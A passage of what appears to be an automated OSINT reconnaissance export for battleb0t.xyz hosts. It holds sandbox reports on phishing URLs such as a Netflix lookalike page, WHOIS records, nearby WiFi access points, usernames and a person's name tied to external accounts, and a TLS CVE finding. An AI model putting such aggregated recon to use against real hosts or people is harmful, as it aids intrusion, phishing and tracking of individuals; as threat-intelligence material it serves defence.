Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: uploads-ssl.webflow.comDNT: 1Connection: Keep-Alive" (Indicator: "youtube")'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-20', u'name': u'HTTP request contains Base64 encoded artifacts', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1132/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1132.001', u'relevance': 7, u'threat_level': 0, u'type': 7, u'description': u'"n"\n "v"\n "f"\n "9"\n "t"\n "="\n "<"\n "6"\n "`"\n "X"\n ">"\n "c"\n ")"\n "A"\n "w"\n "L"\n "u"\n "L"\n "y"\n """, "L", ";", "J", """\n "<"\n "6"\n "f"\n "S"\n "0"\n "y"\n "3"\n "h"\n "~"\n " "\n "b"\n "v"\n "t"\n "\\"\n "U"\n "E"\n """, "5", "N", ".", "\'", "\\", "`", "k", "~", "0", "{", "=", ":", "P", "t", "Z", "f", "/", "1", "6", "I", "d", "h", "q", "D", "j", "0", "6", "2", "f", "O", "8", "*", "b", "E", "j", "/", "P", "v", "C", "v", "/", ".", "-", "6", ";", "_", "q", "Q", "D", "}", "S", "J", "M", "u", "E", "n", "D", "V", "F", "S", ";", "y", "l", "=", "!", "s", "j", ">", "/", "u", "l", "`", "`", "T", "c", "C", "+", "0", "2", "5", "}", "R", "W", "0", "H", "W", "j", "<", "S", "*", "W", "W", "U", "_", "+", "v", "U", "0", "d", ".", "2", ":", ">", "3", "u", ".", "i", "=", """\n "."\n "n"\n "E"\n "+"\n "Q"\n "c"\n "/"\n "2"\n "V"\ | 185.199.111.153 |
| 2023-05-12 02:46:32 | Netblock Membership | No | RIPE | 2 | 0 | 3 | 0 | None | 172.67.160.0/20 | 172.67.168.252 |
| 2023-05-12 03:18:25 | Account on External Site | No | Account Finder | 0 | 0 | 5 | 0 | None | Picsart (Category: art)
https://picsart.com/u/Altpapier | Altpapier |
| 2023-05-12 02:52:21 | Raw Data from RIRs | No | Hybrid Analysis | 1 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://hassan-gamall.github.io/netflix', u'type': u'submitted', u'verdict': u'suspicious'}]}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'http://hassan-gamall.github.io/netflix', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_d70_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_d70_ConnHashTable<3440>_HashTable_Mutex"\n "IsoScope_d70_IESQMMUTEX_0_331"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_d70_IESQMMUTEX_0_519"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3440"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\ZonesCacheCounterMutex"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_d70_IESQMMUTEX_0_303"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_d70_IE_EarlyTabStart_0xf28_Mutex"\n "UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3440"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.108.153:80"\n "185.199.108.153:443"\n "45.57.91.1:443"\n "52.155.62.95:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"hassan-gamall.github.io"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"assets.nflxext.com"\n "hassan-gamall.github.io"\n "query.prod.cms.msn.com"\n "teredo.ipv6.microsoft.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'file/memory contains long string with (Indicator: "dir "; File: "urlref_httphassan-gamall.github.ionetflix")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-56', u'name': u'Drops files with image extension', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 0, u'threat_level': 0, u'type': 8, u'description': u'"o1_1_.png" has type "PNG image data 640 x 480 8-bit/color RGBA non-interlaced" and extension "png"\n "device-pile-in_1_.png" has type "PNG image data 640 x 480 8-bit/color RGBA non-interlaced" and extension "png"\n "bb_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 2000x1125 components 3" and extension "jpg"\n "mobile-0819_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 640x480 components 3" and extension "jpg"\n "netflix-logo-0_1_.png" has type "PNG image data 2208 x 684 8-bit/color RGBA non-interlaced" and extension "png"\n "tv_1_.png" has type "PNG image data 640 x 480 8-bit colormap non-interlaced" and extension "png"\n "images_1_.png" has type "PNG image data 225 x 225 8-bit colormap non-interlaced" and extension "png"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-242', u'name': u'Write files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\{ab1e121d-ebc0-11ed-82af-0800276d1839}.dat"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\temp\\~dfcf958f5828d0de64.tmp"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{ab1e121b-ebc0-11ed-82af-0800276d1839}.dat"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-243', u'name': u'Read files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1083', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~dfcf958f5828d0de64.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\{ab1e121d-ebc0-11ed-82af-0800276d1839}.dat"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\imagestore\\3mt7jhv\\imagestore.dat"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\roaming\\microsoft\\windows\\cookies\\0x82k3c6.txt"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\roaming\\microsoft\\windows\\cookies\\1hgch0kk.txt"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "o1_1_.png" has type "PNG image data 640 x 480 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "bootstrap.min_1_.css" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "device-pile-in_1_.png" has type "PNG image data 640 x 480 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "bb_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 2000x1125 components 3"- [targetUID: N/A]\n "bootstrap.bundle.min_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "mobile-0819_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 640x480 components 3"- [targetUID: N/A]\n "netflix-logo-0_1_.png" has type "PNG image data 2208 x 684 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00003440]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DF8A0CDA8A96816CC6.TMP" has type "data"- Location: [%TEMP%\\~DF8A0CDA8A96816CC6.TMP]- [targetUID: 00000000-00003440]\n "~DF02F37B05898AC81F.TMP" has type "data"- Location: [%TEMP%\\~DF02F37B05898AC81F.TMP]- [targetUID: 00000000-00003440]\n "~DF432D2BE44D8F536C.TMP" has type "data"- Location: [%TEMP%\\~DF432D2BE44D8F536C.TMP]- [targetUID: 00000000-00003440]\n "~DFCF958F5828D0DE64.TMP" has type "data"- Location: [%TEMP%\\~DFCF958F5828D0DE64.TMP]- [targetUID: 00000000-00003440]\n "imagestore.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\imagestore\\3mt7jhv\\imagestore.dat]- [targetUID: 00000000-00003440]\n "tv_1_.png" has type "PNG image data 640 x 480 8-bit colormap non-interlaced"- [targetUID: N/A]\n "netflix_1_.htm" has type "HTML document UTF-8 Unicode text with very long lines with CRLF line terminators"- [targetUID: N/A]\n "main_1_.css" has type "ASCII text with CRLF line terminators"- [targetUID: N/A]\n "RecoveryStore._AB1E121B-EBC0-11ED-82AF-0800276D1839_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_AB1E121D-EBC0-11ED-82AF-0800276D1839_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_B326E299-EBC0-11ED-82AF-0800276D1839_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "images_1_.png" has type "PNG image data 225 x 225 8-bit colormap non-interlaced"- [targetUID: N/A]\n "GVF5NTIT.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\GVF5NTIT.txt]- [targetUID: 00000000-00003440]\n "IXTTQ3R7.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\IXTTQ3R7.txt]- [targetUID: 00000000-00003440]\n "8BT6E19R.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\8BT6E19R.txt]- [targetUID: 00000000-00003440]\n "search_2_.json" has ty | 185.199.108.153 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | hhonors (Net ID: 00:01:03:86:22:27) | 41.8781, -87.6298 |
| 2023-05-12 02:54:27 | HTTP Headers | No | Censys | 0 | 0 | 4 | 0 | None | {"Date": ["<REDACTED>"], "_encoding": {"Date": "DISPLAY_UTF8", "Content_Length": "DISPLAY_UTF8", "X_Nf_Request_Id": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8"}, "Content_Length": ["0"], "X_Nf_Request_Id": ["01H05GB7HXKZRW69FWMYAA1JFJ"], "Server": ["Netlify"]} | 2600:1f18:2489:8202::c8 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Best_Western_27 (Net ID: 00:00:C5:D7:5F:74) | 41.8781, -87.6298 |
| 2023-05-12 03:01:51 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 185.199.110.154:443 | 185.199.110.0/24 |
| 2023-05-12 03:24:49 | Country | No | Country Name Extractor | 0 | 0 | 4 | 0 | None | United States | Domain Name: CLOUDFLARE.COM
Registry Domain ID: 1542998887_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.cloudflare.com
Registrar URL: http://www.cloudflare.com
Updated Date: 2017-05-24T17:44:01Z
Creation Date: 2009-02-17T22:07:54Z
Registry Expiry Date: 2024-02-17T22:07:54Z
Registrar: CloudFlare, Inc.
Registrar IANA ID: 1910
Registrar Abuse Contact Email:
Registrar Abuse Contact Phone:
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: serverDeleteProhibited https://icann.org/epp#serverDeleteProhibited
Domain Status: serverTransferProhibited https://icann.org/epp#serverTransferProhibited
Domain Status: serverUpdateProhibited https://icann.org/epp#serverUpdateProhibited
Name Server: NS3.CLOUDFLARE.COM
Name Server: NS4.CLOUDFLARE.COM
Name Server: NS5.CLOUDFLARE.COM
Name Server: NS6.CLOUDFLARE.COM
Name Server: NS7.CLOUDFLARE.COM
DNSSEC: signedDelegation
DNSSEC DS Data: 2371 13 2 32996839A6D808AFE3EB4A795A0E6A7A39A76FC52FF228B22B76F6D63826F2B9
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T02:59:31Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name: CLOUDFLARE.COM
Registry Domain ID: 1542998887_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.cloudflare.com
Registrar URL: https://www.cloudflare.com
Updated Date: 2021-09-27T15:18:45Z
Creation Date: 2009-02-17T22:07:54Z
Registrar Registration Expiration Date: 2024-02-17T22:07:54Z
Registrar: Cloudflare, Inc.
Registrar IANA ID: 1910
Domain Status: clientdeleteprohibited https://icann.org/epp#clientdeleteprohibited
Domain Status: clienttransferprohibited https://icann.org/epp#clienttransferprohibited
Domain Status: serverdeleteprohibited https://icann.org/epp#serverdeleteprohibited
Domain Status: servertransferprohibited https://icann.org/epp#servertransferprohibited
Domain Status: serverupdateprohibited https://icann.org/epp#serverupdateprohibited
Domain Status: clientupdateprohibited https://icann.org/epp#clientupdateprohibited
Registry Registrant ID:
Registrant Name: DATA REDACTED
Registrant Organization: DATA REDACTED
Registrant Street: DATA REDACTED
Registrant City: DATA REDACTED
Registrant State/Province: CA
Registrant Postal Code: DATA REDACTED
Registrant Country: US
Registrant Phone: DATA REDACTED
Registrant Phone Ext: DATA REDACTED
Registrant Fax: DATA REDACTED
Registrant Fax Ext: DATA REDACTED
Registrant Email: https://domaincontact.cloudflareregistrar.com/cloudflare.com
Registry Admin ID:
Admin Name: DATA REDACTED
Admin Organization: DATA REDACTED
Admin Street: DATA REDACTED
Admin City: DATA REDACTED
Admin State/Province: DATA REDACTED
Admin Postal Code: DATA REDACTED
Admin Country: DATA REDACTED
Admin Phone: DATA REDACTED
Admin Phone Ext: DATA REDACTED
Admin Fax: DATA REDACTED
Admin Fax Ext: DATA REDACTED
Admin Email: https://domaincontact.cloudflareregistrar.com/cloudflare.com
Registry Tech ID:
Tech Name: DATA REDACTED
Tech Organization: DATA REDACTED
Tech Street: DATA REDACTED
Tech City: DATA REDACTED
Tech State/Province: DATA REDACTED
Tech Postal Code: DATA REDACTED
Tech Country: DATA REDACTED
Tech Phone: DATA REDACTED
Tech Phone Ext: DATA REDACTED
Tech Fax: DATA REDACTED
Tech Fax Ext: DATA REDACTED
Tech Email: https://domaincontact.cloudflareregistrar.com/cloudflare.com
Registry Billing ID:
Billing Name: DATA REDACTED
Billing Organization: DATA REDACTED
Billing Street: DATA REDACTED
Billing City: DATA REDACTED
Billing State/Province: DATA REDACTED
Billing Postal Code: DATA REDACTED
Billing Country: DATA REDACTED
Billing Phone: DATA REDACTED
Billing Phone Ext: DATA REDACTED
Billing Fax: DATA REDACTED
Billing Fax Ext: DATA REDACTED
Billing Email: https://domaincontact.cloudflareregistrar.com/cloudflare.com
Name Server: ns3.cloudflare.com
Name Server: ns4.cloudflare.com
Name Server: ns5.cloudflare.com
Name Server: ns6.cloudflare.com
Name Server: ns7.cloudflare.com
DNSSEC: signedDelegation
Registrar Abuse Contact Email: registrar-abuse@cloudflare.com
Registrar Abuse Contact Phone: +1.4153197517
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T02:59:47Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
Cloudflare provides more than 13 million domains with the tools to give their global users a faster, more secure, and more reliable internet experience.
NOTICE:
Data in the Cloudflare Registrar WHOIS database is provided to you by Cloudflare
under the terms and conditions at https://www.cloudflare.com/domain-registration-agreement/
By submitting this query, you agree to abide by these terms.
Register your domain name at https://www.cloudflare.com/registrar/
|
| 2023-05-12 02:44:27 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 2 | 0 | None | Open Graph | nwapi.battleb0t.xyz |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | CAUCESS (Net ID: 00:02:44:A8:10:34) | 50.1188, 8.6843 |
| 2023-05-12 03:19:11 | Human Name | No | Venmo | 2 | 0 | 6 | 0 | None | baptiste vauthey | login |
| 2023-05-12 02:55:11 | BGP AS Membership | No | Censys | 0 | 0 | 2 | 0 | None | 43260 | 87.248.157.102 |
| 2023-05-12 02:54:23 | Linked URL - Internal | No | Web Spider | 0 | 0 | 5 | 0 | None | https://www.ayhu.xyz/?__cf_chl_f_tk=KlbaNJzGw77sVIKMODL.ADC4FpZJphIcqM52Ij1fyiw-1683860063-0-gaNycGzNChA | https://www.ayhu.xyz/?__cf_chl_f_tk=eArohGzIRNubxh3D6IFMRkkS6OUaNS008kBgg4I5pUY-1683860063-0-gaNycGzNCiU |
| 2023-05-12 03:00:58 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.98): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:20:27 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | PinkBike (Category: hobby)
https://www.pinkbike.com/u/patrick.pogoda/ | patrick.pogoda |
| 2023-05-12 03:11:13 | Vulnerability - CVE Low | Yes | Tool - testssl.sh | 0 | 2 | 3 | 0 | None | CVE-2013-0169
https://nvd.nist.gov/vuln/detail/CVE-2013-0169
Score: 2.6
Description: The TLS protocol 1.1 and 1.2 and the DTLS protocol 1.0 and 1.2, as used in OpenSSL, OpenJDK, PolarSSL, and other products, do not properly consider timing side-channel attacks on a MAC check requirement during the processing of malformed CBC padding, which allows remote attackers to conduct distinguishing attacks and plaintext-recovery attacks via statistical analysis of timing data for crafted packets, aka the "Lucky Thirteen" issue. | vscode.battleb0t.xyz |
| 2023-05-12 03:00:26 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.9): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | NazifBey (Net ID: 00:14:C1:18:2D:AC) | 40.2024, 29.0398 |
| 2023-05-12 03:35:51 | Malicious Co-Hosted Site | Yes | OpenDNS | 0 | 1 | 3 | 0 | None | Blocked by OpenDNS [00ffcc.cn] | 00ffcc.cn |
| 2023-05-12 03:12:15 | Affiliate - Domain Whois | No | Whois | 4 | 0 | 6 | 0 | None | Domain Name: TELLERIA.COM
Registry Domain ID: 1147715746_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.gandi.net
Registrar URL: http://www.gandi.net
Updated Date: 2022-06-03T06:12:07Z
Creation Date: 2007-08-11T18:34:23Z
Registry Expiry Date: 2023-08-11T18:34:23Z
Registrar: Gandi SAS
Registrar IANA ID: 81
Registrar Abuse Contact Email: abuse@support.gandi.net
Registrar Abuse Contact Phone: +33.170377661
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Name Server: NS-222-C.GANDI.NET
Name Server: NS-49-A.GANDI.NET
Name Server: NS-89-B.GANDI.NET
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T03:12:06Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name: telleria.com
Registry Domain ID: 1147715746_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.gandi.net
Registrar URL: http://www.gandi.net
Updated Date: 2022-06-03T06:12:07Z
Creation Date: 2007-08-11T16:34:23Z
Registrar Registration Expiration Date: 2023-08-11T18:34:23Z
Registrar: GANDI SAS
Registrar IANA ID: 81
Registrar Abuse Contact Email: abuse@support.gandi.net
Registrar Abuse Contact Phone: +33.170377661
Reseller: CodeSyntax
Domain Status: clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited
Domain Status:
Domain Status:
Domain Status:
Domain Status:
Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: Marcajes Telleria S.L.
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province:
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: ES
Registrant Phone: REDACTED FOR PRIVACY
Registrant Phone Ext:
Registrant Fax: REDACTED FOR PRIVACY
Registrant Fax Ext:
Registrant Email: 589e2ad15175f1c51c0a91d29b753337-1077158@contact.gandi.net
Registry Admin ID: REDACTED FOR PRIVACY
Admin Name: REDACTED FOR PRIVACY
Admin Organization: REDACTED FOR PRIVACY
Admin Street: REDACTED FOR PRIVACY
Admin City: REDACTED FOR PRIVACY
Admin State/Province: REDACTED FOR PRIVACY
Admin Postal Code: REDACTED FOR PRIVACY
Admin Country: REDACTED FOR PRIVACY
Admin Phone: REDACTED FOR PRIVACY
Admin Phone Ext:
Admin Fax: REDACTED FOR PRIVACY
Admin Fax Ext:
Admin Email: 098cbf54d6bdbb0fbdb022d1da6e4300-356617@contact.gandi.net
Registry Tech ID: REDACTED FOR PRIVACY
Tech Name: REDACTED FOR PRIVACY
Tech Organization: REDACTED FOR PRIVACY
Tech Street: REDACTED FOR PRIVACY
Tech City: REDACTED FOR PRIVACY
Tech State/Province: REDACTED FOR PRIVACY
Tech Postal Code: REDACTED FOR PRIVACY
Tech Country: REDACTED FOR PRIVACY
Tech Phone: REDACTED FOR PRIVACY
Tech Phone Ext:
Tech Fax: REDACTED FOR PRIVACY
Tech Fax Ext:
Tech Email: 098cbf54d6bdbb0fbdb022d1da6e4300-356617@contact.gandi.net
Name Server: NS-49-A.GANDI.NET
Name Server: NS-89-B.GANDI.NET
Name Server: NS-222-C.GANDI.NET
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
DNSSEC: Unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T03:12:15Z <<<
For more information on Whois status codes, please visit
https://www.icann.org/epp
Reseller Email:
Reseller URL: http://www.codesyntax.com/
Personal data access and use are governed by French law, any use for the purpose of unsolicited mass commercial advertising as well as any mass or automated inquiries (for any intent other than the registration or modification of a domain name) are strictly forbidden. Copy of whole or part of our database without Gandi's endorsement is strictly forbidden.
A dispute over the ownership of a domain name may be subject to the alternate procedure established by the Registry in question or brought before the courts.
For additional information, please contact us via the following form:
https://www.gandi.net/support/contacter/mail/
| telleria.com |
| 2023-05-12 02:45:20 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'https://web.archive.org/web/20130510155448/http://msdn.microsoft.com/library/office/apps/jj220082(v=office.15)', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://llink.to/?u=https%3A%2F%2Fwww.guelphcrc.ca%2FI%2F', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_1004"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_3ec_IE_EarlyTabStart_0x758_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_3ec_ConnHashTable<1004>_HashTable_Mutex"\n 